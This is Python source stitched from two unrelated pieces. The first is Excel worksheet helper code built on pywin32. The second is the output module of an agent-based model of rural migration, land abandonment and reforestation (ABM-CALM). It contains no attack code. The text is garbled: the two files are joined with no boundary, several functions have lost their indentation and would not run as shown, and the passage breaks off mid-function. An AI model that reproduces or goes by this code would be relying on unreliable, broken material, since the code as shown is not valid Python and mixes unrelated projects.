    def set_values_formulas_formats(self, values_dict=None, formats_dict=None,
                                    formulas_dict=None, arrformulas_dict=None):
        """
        Record per-cell values, formats and formulas, keyed by address.

        NOTE(review): formats, formulas and array formulas all land in
        self.cell_formats, so later dicts overwrite earlier entries for
        the same address -- confirm whether separate stores were intended.

        :param values_dict: {address: value}
        :param formats_dict: {address: format string}
        :param formulas_dict: {address: formula string}
        :param arrformulas_dict: {address: formula string}; stored wrapped
            in braces to mark it as an array formula
        :return: None
        """
        if values_dict is not None:
            self.cell_data.update(values_dict)
        if formats_dict is not None:
            self.cell_formats.update(formats_dict)
        if formulas_dict is not None:
            self.cell_formats.update(formulas_dict)
        if arrformulas_dict is not None:
            for addr, v in arrformulas_dict.items():
                self.cell_formats[addr] = '{' + v + '}'

    def copy_ws_to_wb(self, target_wb, after=True, sheet_num=0):
        """
        Copy this worksheet into another workbook.

        :param target_wb: destination Workbook wrapper
        :param after: insert after (True) or before (False) the anchor sheet
        :param sheet_num: 0-based index of the anchor sheet in target_wb
        :return: None
        """
        # bug fix: get_sheet() matches by *name*, so passing the integer
        # sheet_num never matched anything; index the sheet list directly.
        # (Also dropped an unused `from copy import copy`.)
        anchor = target_wb.sheets[sheet_num].ws
        if after:
            self.ws.Copy(After=anchor)
        else:
            self.ws.Copy(Before=anchor)
def _rgb2xlcol(rgb):
"""
converts an rgb tuple into a color index as expected by excel
:param rgb:
:return:
"""
strValue = '%02x%02x%02x' % tuple(rgb)
iValue = int(strValue, 16)
return iValue
def _parse_windates(v):
    """
    Recursively replace pywin32 time values with plain datetime objects.

    :param v: a scalar, list, or (nested) list/tuple possibly containing
        pywin32 times
    :return: same structure with pywin32 times converted to
        datetime.datetime (tuples come back as lists)
    """
    if isinstance(v, (list, tuple)):
        return [_parse_windates(item) for item in v]
    if isinstance(v, _pywintypes.TimeType):
        return _datetime.datetime(v.year, v.month, v.day, v.hour, v.minute, v.second)
    return v
def _dt2pywintime(d):
    """
    Convert a date/datetime into a UTC pywin32 time suitable for writing
    to Excel; any other value passes through unchanged.

    :param d: datetime.datetime, datetime.date, or anything else
    :return: pywin32 time, or d unchanged
    """
    tz=_pytz.timezone('utc')
    # datetime must be tested before date: datetime is a subclass of date
    if isinstance(d,_datetime.datetime):
        out = _pywintypes.TimeType(d.year, d.month, d.day, d.hour, d.minute, d.second, tzinfo=tz)
    elif isinstance(d,_datetime.date):
        out=_pywintypes.TimeType(d.year,d.month,d.day,tzinfo=tz)
    else:
        out=d
    return out
def _fix_4_win(ll):
    """
    Recursively convert date/datetime values into pywin32 times so the
    structure can be written to Excel.

    :param ll: scalar or (nested) list/tuple
    :return: converted structure (tuples come back as lists)
    """
    if isinstance(ll, (list, tuple)):
        return [_fix_4_win(item) for item in ll]
    if isinstance(ll, (_datetime.datetime, _datetime.date)):
        return _dt2pywintime(ll)
    return ll
""" ABM-CALM: Qi Zhang (qz@unc.edu;qz@bu.edu) """
### Output Functions [awrite.py] ####
"""
O-Function 0a: Write dataframe headlines
O-Function 0b: Write initialized agent attributes
O-Function 1a: Derive stats for population
O-Function 1b: Write out stats for migration
O-Function 2a: Store stats of farm plot (area)
O-Function 2b: Write out stats for abandonment (area)
O-Function 3a: Store stats of ccfp plots (area)
O-Function 3b: Write out stats for planting (area)
O-Function 4a: Write out stats for collective action
O-Function 4b: Compare collective stats for learned and indigenous
O-Function 5: Derive and write status of each tick
"""
""" O-Function 0a: Write dataframe headlines """
def df_head(dfType):
    """
    Return the column-name list for one of the model's output dataframes.

    :param dfType: behaviour logs: 'mig', 'ret', 'aba', 'rec', 'ren',
        'pla', 'rev'; per-tick stats: 'staMig', 'staAba', 'staPla',
        'staCol', 'staCom', 'staFin'; initialisation dumps: 'iniINs',
        'iniPLs', 'iniHHs'
    :return: list of column-name strings
    :raises ValueError: for an unknown dfType (previously an unknown key
        fell through and raised a confusing UnboundLocalError on `rl`)
    """
    # b1 - individual: migrate
    if dfType == 'mig':
        l1 = ['Mig!', 'tick', 'pid', 'hhid', 'rgid', 'villid']
        l2 = ['relateHead', 'ifFemale', 'age', 'ifMarried', 'numChild']
        l3 = ['ifOutMig', 'ifRetMig', 'ifEverOut', 'work', 'edu']
        l4 = ['ifCcfp', 'ifCcfpO', 'rand', 'probMig']
        rl = l1 + l2 + l3 + l4
    # b2 - individual: return
    elif dfType == 'ret':
        l1 = ['Ret!', 'tick', 'pid', 'hhid', 'rgid', 'villid']
        l2 = ['relateHead', 'ifFemale', 'age', 'ifMarried', 'numChild']
        l3 = ['ifOutMig', 'ifRetMig', 'ifEverOut', 'work', 'edu']
        l4 = ['ifCcfp', 'ifCcfpO', 'r', 'pReturn']
        rl = l1 + l2 + l3 + l4
    # b3 - plot: be abandoned
    elif dfType == 'aba':
        l1 = ['Aba!', 'tick', 'plid', 'hhid', 'rgid', 'villid']
        l2 = ['centerX', 'centerY', 'area', 'code', 'dry', 'elev', 'slope']
        l3 = ['aspect', 'twi', 'distCcfp', 'distEwfp', 'distEwfpO']
        l4 = ['geoDist', 'abanYr', 'ifCcfp', 'ifCcfpO', 'rand', 'probAba']
        rl = l1 + l2 + l3 + l4
    # b4 - plot: be reclaimed
    elif dfType == 'rec':
        l1 = ['Rec!', 'tick', 'plid', 'hhid', 'rgid', 'villid']
        l2 = ['centerX', 'centerY', 'area', 'code', 'dry', 'elev', 'slope']
        l3 = ['aspect', 'twi', 'distCcfp', 'distEwfp', 'distEwfpO']
        l4 = ['geoDist', 'abanYr', 'ifCcfp', 'ifCcfpO', 'r', 'pReclaim']
        rl = l1 + l2 + l3 + l4
    # b5 - plot: be rented-out or -in
    elif dfType == 'ren':
        l1 = ['Ren!', 'tick', 'plid', 'hhid', 'rgid', 'villid']
        l2 = ['centerX', 'centerY', 'area', 'code', 'dry', 'elev', 'slope']
        l3 = ['aspect', 'twi', 'distCcfp', 'distEwfp', 'distEwfpO']
        l4 = ['geoDist', 'abanYr', 'ifCcfp', 'ifCcfpO', 'r', 'pRent']
        l5 = ['hhidOu', 'hhidIn']
        rl = l1 + l2 + l3 + l4 + l5
    # b6 - plot: be planted
    elif dfType == 'pla':
        l1 = ['Pla!', 'tick', 'plid', 'hhid', 'rgid', 'villid']
        l2 = ['centerX', 'centerY', 'area', 'code', 'dry', 'elev', 'slope']
        l3 = ['aspect', 'twi', 'distCcfp', 'distEwfp', 'distEwfpO']
        l4 = ['geoDist', 'abanYr', 'ifCcfp', 'ifCcfpO', 'rand', 'probPla', 'cRG']
        l5 = ['propActPl', 'areActPl', 'areTotPl']
        l6 = ['percActGp', 'numActGp', 'numTotGp']
        rl = l1 + l2 + l3 + l4 + l5 + l6
    # b7 - plot: be reverted
    elif dfType == 'rev':
        l1 = ['Rev!', 'tick', 'plid', 'hhid', 'rgid', 'villid']
        l2 = ['centerX', 'centerY', 'area', 'code', 'dry', 'elev', 'slope']
        l3 = ['aspect', 'twi', 'distCcfp', 'distEwfp', 'distEwfpO']
        l4 = ['geoDist', 'abanYr', 'ifCcfp', 'ifCcfpO', 'r', 'pRevert']
        rl = l1 + l2 + l3 + l4
    # s1 - demographics for migration (individual)
    elif dfType == 'staMig':
        l1 = ['StaMig!', 'tick']
        l2 = ['percMig', 'percMig1', 'percMig0']
        l3 = ['numMig', 'numMig1', 'numMig0', 'numPop', 'numPop1', 'numPop0']
        l4 = ['percRet', 'percRet1', 'percRet0']
        l5 = ['numRet', 'numRet1', 'numRet0', 'numCur', 'numCur1', 'numCur0']
        l6 = ['percMigL', 'percMigI', 'numMigL', 'numMigI', 'numPopL', 'numPopI']
        l7 = ['percRetL', 'percRetI', 'numRetL', 'numRetI', 'numCurL', 'numCurI']
        rl = l1 + l2 + l3 + l4 + l5 + l6 + l7
    # s2 - lands for abandonment (plot)
    elif dfType == 'staAba':
        l1 = ['StaAba!', 'tick']
        l2 = ['propAba', 'propAba1', 'propAba0']
        l3 = ['areAba', 'areAba1', 'areAba0', 'arePlo', 'arePlo1', 'arePlo0']
        l4 = ['propRec', 'propRec1', 'propRec0']
        l5 = ['areRec', 'areRec1', 'areRec0', 'areCur', 'areCur1', 'areCur0']
        l6 = ['propAbaL', 'propAbaI', 'areAbaL', 'areAbaI', 'arePloL', 'arePloI']
        l7 = ['propRecL', 'propRecI', 'areRecL', 'areRecI', 'areCurL', 'areCurI']
        rl = l1 + l2 + l3 + l4 + l5 + l6 + l7
    # s3 - lands for tree planting (plot)
    elif dfType == 'staPla':
        l1 = ['StaPla!', 'tick']
        l2 = ['propPla', 'propPla1', 'propPla0']
        l3 = ['arePla', 'arePla1', 'arePla0', 'areAPs', 'areAPs1', 'areAPs0']
        l4 = ['propRev', 'propRev1', 'propRev0']
        l5 = ['areRev', 'areRev1', 'areRev0', 'areCCs', 'areCCs1', 'areCCs0']
        l6 = ['propPlaL', 'propPlaI', 'arePlaL', 'arePlaI', 'areAPsL', 'areAPsI']
        l7 = ['propRevL', 'propRevI', 'areRevL', 'areRevI', 'areCCsL', 'areCCsI']
        rl = l1 + l2 + l3 + l4 + l5 + l6 + l7
    # s4 - collective action of reforestation (social norm)
    elif dfType == 'staCol':
        l1 = ['StaCol!', 'tick', 'rPlAb', 'arePl', 'areAb', 'm_probPla', 'm_cRG']
        l2 = ['m_propActPl', 'm_areActPl', 'm_areTotPl']
        l3 = ['m_percActGp', 'm_numActGp', 'm_numTotGp']
        rl = l1 + l2 + l3
    # s5 - collective: learned vs indigenous
    elif dfType == 'staCom':
        l1 = ['StaCom!', 'tick']
        l2 = ['rPlAbL', 'arePlL', 'areAbL', 'm_probPlaL', 'm_cRGL']
        l3 = ['m_propActPlL', 'm_areActPlL', 'm_areTotPlL']
        l4 = ['m_percActGpL', 'm_numActGpL', 'm_numTotGpL']
        l5 = ['rPlAbI', 'arePlI', 'areAbI', 'm_probPlaI', 'm_cRGI']
        l6 = ['m_propActPlI', 'm_areActPlI', 'm_areTotPlI']
        l7 = ['m_percActGpI', 'm_numActGpI', 'm_numTotGpI']
        rl = l1 + l2 + l3 + l4 + l5 + l6 + l7
    # s6 - final status of each tick
    elif dfType == 'staFin':
        l1 = ['staFin!', 'tick']
        l2 = ['ind', 'pop', 'cur', 'ret', 'ever']
        l3 = ['land', 'cul', 'aba', 'ccf', 'zcul', 'zaba', 'zccf']
        l4 = ['hhs', 'hh1', 'hh0', 'zhh1', 'zhh0']
        l5 = ['hhL', 'hhI', 'zhhL', 'zhhI']
        rl = l1 + l2 + l3 + l4 + l5
    # i1 - initialized individual attributes
    elif dfType == 'iniINs':
        l1 = ['pid', 'hhid', 'rgid', 'villid', 'relateHead', 'ifFemale']
        l2 = ['age', 'ifMarried', 'numChild', 'ifOutMig', 'ifRetMig']
        l3 = ['ifEverOut', 'work', 'edu', 'ifCcfp', 'ifCcfpO']
        rl = l1 + l2 + l3
    # i2 - initialized plot features
    elif dfType == 'iniPLs':
        l1 = ['plid', 'hhid', 'rgid', 'villid', 'centerX', 'centerY', 'area']
        l2 = ['code', 'dry', 'elev', 'slope', 'aspect', 'twi', 'distCcfp']
        l3 = ['distEwfp', 'distEwfpO', 'geoDist', 'abanYr', 'ifCcfp', 'ifCcfpO']
        rl = l1 + l2 + l3
    # i3 - initialized household characteristics
    elif dfType == 'iniHHs':
        l1 = ['hhid', 'rgid', 'villid', 'hhLocX', 'hhLocY', 'hhElev']
        l2 = ['hdIfFemale', 'hdAge', 'hdEdu', 'hdIfMarried']
        l3 = ['hhSize', 'hhNumCurOut', 'hhNumPreOut', 'hhLandOwn']
        l4 = ['hhLandPlant', 'areaCcfp', 'areaEwfp', 'ifCcfp', 'ifCcfpO', 'sn']
        rl = l1 + l2 + l3 + l4
    else:
        raise ValueError('unknown dfType: %r' % (dfType,))
    # return the column names
    return rl
""" O-Function 0b: Write initialized agent attributes """
def tp_attr(df, inList, plList, hhList, agType):
    """
    Append initialised agent attribute rows to a dataframe.

    Exactly one of the three agent lists is consumed, selected by agType;
    each agent contributes one row via its write_self() method.

    :param df: target dataframe (mutated in place, one row per agent)
    :param inList: individual agents (used when agType == 'ins')
    :param plList: plot agents (used when agType == 'pls')
    :param hhList: household agents (used when agType == 'hhs')
    :param agType: 'ins', 'pls' or 'hhs'
    :return: the (mutated) dataframe
    """
    source = {'ins': inList, 'pls': plList, 'hhs': hhList}.get(agType, [])
    for agent in source:
        df.loc[len(df)] = agent.write_self()
    return df
""" O-Function 1a: Derive stats for population """
def stat_in_pop(inList):
    """
    Derive population statistics from the individual-agent list.

    Agents are split into non-migrants (ifOutMig == 0) and current
    migrants (ifOutMig == 1); each group is counted overall, by CCFP
    membership, and by learned (ifCcfpO == 0) vs indigenous (ifCcfpO == 1)
    CCFP membership.

    :param inList: individual agents with ifOutMig / ifCcfp / ifCcfpO flags
    :return: [numPop, numPop1, numPop0, numCur, numCur1, numCur0,
              numPopL, numPopI, numCurL, numCurI]
    """
    residents = [a for a in inList if a.ifOutMig == 0]
    migrants = [a for a in inList if a.ifOutMig == 1]

    def _counts(group):
        # total, in CCFP, not in CCFP, learned CCFP, indigenous CCFP
        total = len(group)
        ccfp = len([a for a in group if a.ifCcfp == 1])
        no_ccfp = len([a for a in group if a.ifCcfp == 0])
        learned = len([a for a in group if a.ifCcfp == 1 and a.ifCcfpO == 0])
        indigenous = len([a for a in group if a.ifCcfp == 1 and a.ifCcfpO == 1])
        return total, ccfp, no_ccfp, learned, indigenous

    numPop, numPop1, numPop0, numPopL, numPopI = _counts(residents)
    numCur, numCur1, numCur0, numCurL, numCurI = _counts(migrants)
    # order expected downstream by stat_in_mig / the staMig writer
    return [numPop, numPop1, numPop0, numCur, numCur1, numCur0,
            numPopL, numPopI, numCurL, numCurI]
""" O-Function 1b: Write out stats for migration """
def stat_in_mig(u1, u2, l, ls):
    """
    Derive and order the migration statistics for one tick.

    :param u1: pids of individuals who decided to migrate out this tick
    :param u2: pids of individuals who decided to return home this tick
    :param l: list of individual agents (pid / ifCcfp / ifCcfpO attributes)
    :param ls: population stats from stat_in_pop():
        [numPop, numPop1, numPop0, numCur, numCur1, numCur0,
         numPopL, numPopI, numCurL, numCurI]
    :return: 30-element list ordered to match df_head('staMig') after the
        tag/tick columns; percentages are -9 when the denominator is zero
    """
    # perf: membership tests against the id collections are O(1) on sets
    # (the old code scanned the u1/u2 lists once per agent)
    out_ids = set(u1)
    ret_ids = set(u2)
    # number of people who decide to migrate out
    numMig = len(u1)
    numMig1 = len([a for a in l if a.pid in out_ids and a.ifCcfp == 1])
    numMig0 = len([a for a in l if a.pid in out_ids and a.ifCcfp == 0])
    # percentages (-9 flags an empty denominator)
    percMig = numMig / ls[0] if ls[0] > 0 else -9    # numPop
    percMig1 = numMig1 / ls[1] if ls[1] > 0 else -9  # numPop1
    percMig0 = numMig0 / ls[2] if ls[2] > 0 else -9  # numPop0
    # number of people who decide to return home
    numRet = len(u2)
    numRet1 = len([a for a in l if a.pid in ret_ids and a.ifCcfp == 1])
    numRet0 = len([a for a in l if a.pid in ret_ids and a.ifCcfp == 0])
    percRet = numRet / ls[3] if ls[3] > 0 else -9    # numCur
    percRet1 = numRet1 / ls[4] if ls[4] > 0 else -9  # numCur1
    percRet0 = numRet0 / ls[5] if ls[5] > 0 else -9  # numCur0
    # learned (ifCcfpO == 0) vs indigenous (ifCcfpO == 1) CCFP members
    numMigL = len([a for a in l if a.pid in out_ids and a.ifCcfp == 1 and a.ifCcfpO == 0])
    numMigI = len([a for a in l if a.pid in out_ids and a.ifCcfp == 1 and a.ifCcfpO == 1])
    percMigL = numMigL / ls[6] if ls[6] > 0 else -9  # numPopL
    percMigI = numMigI / ls[7] if ls[7] > 0 else -9  # numPopI
    numRetL = len([a for a in l if a.pid in ret_ids and a.ifCcfp == 1 and a.ifCcfpO == 0])
    numRetI = len([a for a in l if a.pid in ret_ids and a.ifCcfp == 1 and a.ifCcfpO == 1])
    percRetL = numRetL / ls[8] if ls[8] > 0 else -9  # numCurL
    percRetI = numRetI / ls[9] if ls[9] > 0 else -9  # numCurI
    # assemble in the exact column order expected by the writer
    rl1 = [percMig, percMig1, percMig0, numMig, numMig1, numMig0] + ls[0:3]
    rl2 = [percRet, percRet1, percRet0, numRet, numRet1, numRet0] + ls[3:6]
    rl3 = [percMigL, percMigI, numMigL, numMigI] + ls[6:8]
    rl4 = [percRetL, percRetI, numRetL, numRetI] + ls[8:]
    return rl1 + rl2 + rl3 + rl4
""" O-Function 2a: Store stats of farm plot (area) """
def stat_fp_plo(plList):
# plList = aglistPLs
# plots (area):
# arePlo , arePlo1, arePlo0, areCur, areCur1, areCur0
# arePloL, arePloI, areCurL, areCurI
# get list of cultivated plots only
l_cul = [a for a in plList if a.code in [60,61]]
# stats: area of planted plots, by CCFP
arePlo = sum([a.area for a in l_cul]) # total
arePlo1 = sum([a.area for a in l_cul if a.ifCcfp==1]) # ccfp = 1
arePlo0 = sum([a.area for a in l_cul if a.ifCcfp==0]) # ccfp = 0
# get list of abandoned plots only
l_cur = [a for a in plList if a.code in [69]]
# stats: area of non-migrants, by CCFP
areCur = sum([a.area for a in l_cur]) # total
areCur1 = sum([a.area for a in l_cur if a.ifCcfp==1]) # ccfp = 1
areCur0 = sum([a.area for a in l_cur if a.ifCcfp==0]) # ccfp = 0
# derive indigenous and learned CCFP household land area
arePloL = sum([a.area for a in l_cul if a.ifCcfp==1 and a.ifCcfpO==0])
arePloI = sum([a.area for a in l_cul if a.ifCcfp==1 and a.ifCcfpO==1])
areCurL = sum([a.area for a in l_cur if a.ifCcfp==1 and a.ifCcfpO==0])
areCurI = sum([a.area for a in l_cur if a.ifCcfp==1 and a.ifCcfpO==1])
# add all to list
rl1 = [arePlo , arePlo1, arePlo0, areCur, areCur1, areCur0]
rl2 = [arePloL, arePloI, areCurL, areCurI]
# return to lStatFP
return rl1 + rl2
""" O-Function 2b: Write out stats for abandonment (area) """
def stat_fp_aba(u1, u2, l, ls):
# u1=upd_aba, u2=upd_rec, l=aglistPLs, ls=lStatFP
# ls=lStatFP =
# [arePlo, arePlo1, arePlo0, areCur, areCur1, areCur0
# arePloL, arePloI, areCurL, areCurI]
# land:
# propAba , propAba1, propAba0, areAba, areAba1, areAba0,
# arePlo , arePlo1 , arePlo0
# propRec , propRec1, propRec0, areRec, areRec1, areRec0,
# areCur , areCur1 , areCur0
# propAbaL, propAbaI, areAbaL, areAbaI, arePloL, arePloI
# propRecL, propRecI, areRecL, areRecI, areCurL, areCurI
# area of plots to be abandoned
areAba = sum([a.area for a in l if a.plid in u1])
areAba1 = sum([a.area for a in l if a.plid in u1 and a.ifCcfp==1])
areAba0 = sum([a.area for a in l if a.plid in u1 and a.ifCcfp==0])
# percent
propAba = areAba / ls[0] if ls[0] > 0 else -9 # arePlo
propAba1 = areAba1 / ls[1] if ls[1] > 0 else -9 # arePlo1
propAba0 = areAba0 / ls[2] if ls[2] > 0 else -9 # arePlo0
# area of plots to be reclaimed
areRec = sum([a.area for a in l if a.plid in u2])
areRec1 = sum([a.area for a in l if a.plid in u2 and a.ifCcfp==1])
areRec0 = sum([a.area for a in l if a.plid in u2 and a.ifCcfp==0])
# percent
propRec = areRec / ls[3] if ls[3] > 0 else -9 # areCur
propRec1 = areRec1 / ls[4] if ls[4] > 0 else -9 # areCur1
propRec0 = areRec0 / ls[5] if ls[5] > 0 else -9 # areCur0
# derive stats for indigenous vs learned
# area of being abandoned
l1 = [a for a in l if a.plid in u1]
areAbaL = sum([a.area for a in l1 if a.ifCcfp==1 and a.ifCcfpO==0])
areAbaI = sum([a.area for a in l1 if a.ifCcfp==1 and a.ifCcfpO==1])
# percent
propAbaL = areAbaL / ls[6] if ls[6] > 0 else -9 # arePloL
propAbaI = areAbaI / ls[7] if ls[7] > 0 else -9 # arePloI
# area of being reclaimed
l2 = [a for a in l if a.plid in u2]
areRecL = sum([a.area for a in l2 if a.ifCcfp==1 and a.ifCcfpO==0])
areRecI = sum([a.area for a in l2 if a.ifCcfp==1 and a.ifCcfpO==1])
# percent
propRecL = areRecL / ls[8] if ls[8] > 0 else -9 # areCurL
propRecI = areRecI / ls[9] if ls[9] > 0 else -9 # areCurI
# store in a list: 9 + 9 # !! note the order !!
# abandoned
rl1 = [propAba, propAba1, propAba0, areAba, areAba1, areAba0] + ls[0:3]
# reclaimed
rl2 = [propRec, propRec1, propRec0, areRec, areRec1, areRec0] + ls[3:6]
# indigenous vs learned
rl3 = [propAbaL, propAbaI, areAbaL, areAbaI] + ls[6:8]
rl4 = [propRecL, propRecI, areRecL, areRecI] + ls[8: ]
# return to al
return rl1 + rl2 + rl3 + rl4
""" O-Function 3a: Store stats of ccfp plots (area) """
def stat_cc_plo(plList):
# plList = aglistPLs
# ccfp plots (area):
# areAPs, areAPs1, areAPs0, areCCs, areCCs1, areCCs0
# areAPsL, areAPsI, areCCsL, areCCsI
# get list of abandoned plots only
l_aba = [a for a in plList if a.code in [69]]
# stats: area of abandoned plots, by CCFP
areAPs = sum([a.area for a in l_aba])
areAPs1 = sum([a.area for a in l_aba if a.ifCcfp==1])
areAPs0 = sum([a.area for a in l_aba if a.ifCcfp==0])
# get list of ccfp plots only
l_ccf = [a for a in plList if a.code in [99]]
# stats: area of ccfp plots, by CCFP
areCCs = sum([a.area for a in l_ccf])
areCCs1 = sum([a.area for a in l_ccf if a.ifCcfp==1])
areCCs0 = sum([a.area for a in l_ccf if a.ifCcfp==0])
# derive indigenous and learned CCFP household land area
areAPsL = sum([a.area for a in l_aba if a.ifCcfp==1 and a.ifCcfpO==0])
areAPsI = sum([a.area for a in l_aba if a.ifCcfp==1 and a.ifCcfpO==1])
areCCsL = sum([a.area for a in l_ccf if a.ifCcfp==1 and a.ifCcfpO==0])
areCCsI = sum([a.area for a in l_ccf if a.ifCcfp==1 and a.ifCcfpO==1])
# add all to list
rl1 = [areAPs, areAPs1, areAPs0, areCCs, areCCs1, areCCs0]
rl2 = [ areAPsL, areAPsI, areCCsL, areCCsI]
# return to lStatCC
return rl1 + rl2
""" O-Function 3b: Write out stats for planting (area)"""
def stat_cc_pla(u1, u2, l, ls):
# u1=upd_pla, u2=upd_rev, l=aglistPLs, ls=lStatCCa
# ls=lStatCCa =
# [areAPs, areAPs1, areAPs0, areCCs, areCCs1, areCCs0
# areAPsL, areAPsI, areCCsL, areCCsI]
# ccfp plots (area):
# propPla, propPla1, propPla0, arePla, arePla1, arePla0,
# areAPs , areAPs1 , areAPs0
# propRev, propRev1, propRev0, areRev, areRev1, areRev0,
# areCCs , areCCs1 , areCCs0
# propPlaL, propPlaI, arePlaL, arePlaI, areAPsL, areAPsI
# propRevL, propRevI, areRevL, areRevI, areCCsL, areCCsI
# area of plots to be planted
arePla = sum([a.area for a in l if a.plid in u1])
arePla1 = sum([a.area for a in l if a.plid in u1 and a.ifCcfp==1])
arePla0 = sum([a.area for a in l if a.plid in u1 and a.ifCcfp==0])
# proportion
propPla = arePla / ls[0] if ls[0] > 0 else -9 # ls[0]: areAPs
propPla1 = arePla1 / ls[1] if ls[1] > 0 else -9 # ls[1]: areAPs1
propPla0 = arePla0 / ls[2] if ls[2] > 0 else -9 # ls[2]: areAPs0
# area of plots to be reverted
areRev = sum([a.area for a in l if a.plid in u2])
areRev1 = sum([a.area for a in l if a.plid in u2 and a.ifCcfp==1])
areRev0 = sum([a.area for a in l if a.plid in u2 and a.ifCcfp==0])
# percent
propRev = areRev / ls[3] if ls[3] > 0 else -9 # ls[3]: areCCs
propRev1 = areRev1 / ls[4] if ls[4] > 0 else -9 # ls[4]: areCCs1
propRev0 = areRev0 / ls[5] if ls[5] > 0 else -9 # ls[5]: areCCs0
# derive stats for indigenous vs learned
# area of being planted
l1 = [a for a in l if a.plid in u1]
arePlaL = sum([a.area for a in l1 if a.ifCcfp==1 and a.ifCcfpO==0])
arePlaI = sum([a.area for a in l1 if a.ifCcfp==1 and a.ifCcfpO==1])
# percent
propPlaL = arePlaL / ls[6] if ls[6] > 0 else -9 # areAPsL
propPlaI = arePlaI / ls[7] if ls[7] > 0 else -9 # areAPsI
# area of being reverted
l2 = [a for a in l if a.plid in u2]
areRevL = sum([a.area for a in l2 if a.ifCcfp==1 and a.ifCcfpO==0])
areRevI = sum([a.area for a in l2 if a.ifCcfp==1 and a.ifCcfpO==1])
# percent
propRevL = areRevL / ls[8] if ls[8] > 0 else -9 # areCCsL
propRevI = areRevI / ls[9] if ls[9] > 0 else -9 # areCCsI
# store in a list: 9 + 9 # !! note the order !!
# planted
rl1 = [propPla, propPla1, propPla0, arePla, arePla1, arePla0] + ls[0:3]
# reverted
rl2 = [propRev, propRev1, propRev0, areRev, areRev1, areRev0] + ls[3:6]
# indigenous vs learned
rl3 = [propPlaL, propPlaI, arePlaL, arePlaI] + ls[6:8]
rl4 = [propRevL, propRevI, areRevL, areRevI] + ls[8: ]
# return to al
return rl1 + rl2 + rl3 + rl4
""" O-Function 4a: Write out stats for collective action """
def stat_cc_col(u, l):
# u=opt_pla, l=aglistPLs
# opt_pla's one element is
# 0 [probPla, cRG]
# 2 propActPl, areActPl, areTotPl, percActGp, numActGp, numTotGp
# 8 plid2, hhid2, area2, ifCcfp2, ifCcfpO2]
# collective
# all participants
# rPlAb , arePl , areAb , m_probPla , m_cRG
# m_propActPl , m_areActPl , m_areTotPl
# m_percActGp , m_numActGp , m_numTotGp
# calculate planted area
u_ids = list(set([a[9] for a in u])) # hhid to plant
l_aba = [a for a in l if a.code==69] # abandoned plots
# get abandoned area for planted, and those (NOT planted) and (CCFP)
areAb1= sum([a.area for a in l_aba if a.hhid in u_ids])
areAb2= sum([a.area for a in l_aba if a.hhid not in u_ids and a.ifCcfp==1])
areAb = (areAb1 + areAb2)
# get planted area
arePl = sum([a[10] for a in u]) # a[10]:area2
rPlAb = arePl / areAb if areAb > 0 else -9
rl1a = [rPlAb, arePl, areAb]
# dervie mean of collective variables, excluding: plid2, area2, ...
rl1b = []
for i in range(8):
rl1b.append(sum([a[i] for a in u]) / len(u) if len(u) > 0 else -9)
# return to al
return rl1a + rl1b
""" O-Function 4b: Compare collective stats for learned and indigenous """
def stat_cc_com(u, l):
# u=opt_pla, l=aglistPLs
# opt_pla's one element is
# 0 [probPla, cRG]
# 2 propActPl, areActPl, areTotPl, percActGp, numActGp, numTotGp
# 8 plid2, hhid2, area2, ifCcfp2, ifCcfpO2]
# collective
# learned
# rPlAbL, arePlL, areAbL, m_probPlaL, m_cRGL
# m_propActPlL, m_areActPlL, m_areTotPlL
# m_percActGpL, m_numActGpL, m_numTotGpL
# indigenous
# rPlAbI, arePlI, areAbI, m_probPlaI, m_cRGI
# m_propActPlI, m_areActPlI, m_areTotPlI
# m_percActGpI, m_numActGpI, m_numTotGpI
# derive learned CCFP participants collective action
u_ids = list(set([a[9] for a in u])) # hhid to plant
l_aba = [a for a in l if a.code==69 and a.ifCcfpO==0] # abandoned, learned
# get abandoned area from two parts of learned CCFP households
areAb1= sum([a.area for a in l_aba if a.hhid in u_ids])
areAb2= sum([a.area for a in l_aba if a.hhid not in u_ids and a.ifCcfp==1])
areAb = areAb1 + areAb2
# calculate existing abandoned area
arePl = sum([a[10] for a in u if a[12]==0]) # a[9]:area2, a[12]:ifCcfpO2
# ratio of planted on abandoned areas
rPlAb = arePl / areAb if areAb > 0 else -9
# add to list
rl2a = [rPlAb, arePl, areAb]
# dervie mean of collective variables, excluding: plid2, area2, ...
u2 = [a for a in u if a[12]==0] # a[12]:ifCcfpO2
rl2b = []
for i in range(8):
rl2b.append(sum([a[i] for a in u2]) / len(u2) if len(u2) > 0 else -9)
# derive indigenous CCFP participants collective action
u_ids = list(set([a[9] for a in u])) #hhid to plant
l_aba = [a for a in l if a.code==69 and a.ifCcfpO==1] #abandoned,indigenous
# get abandoned area from two parts of learned CCFP households
areAb1= sum([a.area for a in l_aba if a.hhid in u_ids])
areAb2= sum([a.area for a in l_aba if a.hhid not in u_ids and a.ifCcfp==1])
areAb = areAb1 + areAb2
# calculate existing abandoned area
arePl = sum([a[10] for a in u if a[12]==1]) # a[9]:area2, a[12]:ifCcfpO2
# ratio of planted on abandoned areas
rPlAb = arePl / areAb if areAb > 0 else -9
# add to list
rl3a = [rPlAb, arePl, areAb]
# dervie mean of collective variables, excluding: plid2, area2, ...
u2 = [a for a in u if a[12]==1] # a[12]:ifCcfpO2
rl3b = []
for i in range(8):
rl3b.append(sum([a[i] for a in u2]) / len(u2) if len(u2) > 0 else -9)
# reminder
# 0 [probPla, cRG]
# 2 propActPl, areActPl, areTotPl, percActGp, numActGp, numTotGp
# 8 plid2, hhid2, area2, ifCcfp2, ifCcfpO2]
# return to
return rl2a + rl2b + rl3a +rl3b
""" O-Function 5: Derive and write status of each tick """
def tick_final(t, inList, plList, hhList):
# t=tick+1, inList=aglistINs, plList=aglistPLs, hhList=aglistHHs
# individuals
ind = len(inList)
pop = len([a for a in inList if a.ifOutMig==0])
cur = len([a for a in inList if a.ifOutMig==1])
ret = len([a for a in inList if a.ifOutMig==0 and a.ifRetMig ==1])
ever = len([a for a in inList if a.ifOutMig==0 and a.ifEverOut==1])
# plots
land = sum([a.area for a in plList])
cul = sum([a.area for a in plList if a.code in [60,61]])
aba = sum([a.area for a in plList if a.code in [69 ]])
ccf = sum([a.area for a in plList if a.code in [99 ]])
zcul = cul / land if land > 0 else -9
zaba = aba / land if land > 0 else -9
zccf = ccf / land if land > 0 else -9
# households
hhs = len(hhList)
hh1 = len([a for a in hhList if a.ifCcfp==1])
hh0 = len([a for a in hhList if a.ifCcfp==0])
zhh1 = hh1 / hhs if hhs > 0 else -9
zhh0 = hh0 / hhs if hhs > 0 else -9
hhL = len([a for a in hhList if a.ifCcfp==1 and a.ifCcfpO==0])
hhI = len([a for a in hhList if a.ifCcfp==1 and a.ifCcfpO==1])
zhhL = hhL / hh1 if hh1 > 0 else -9
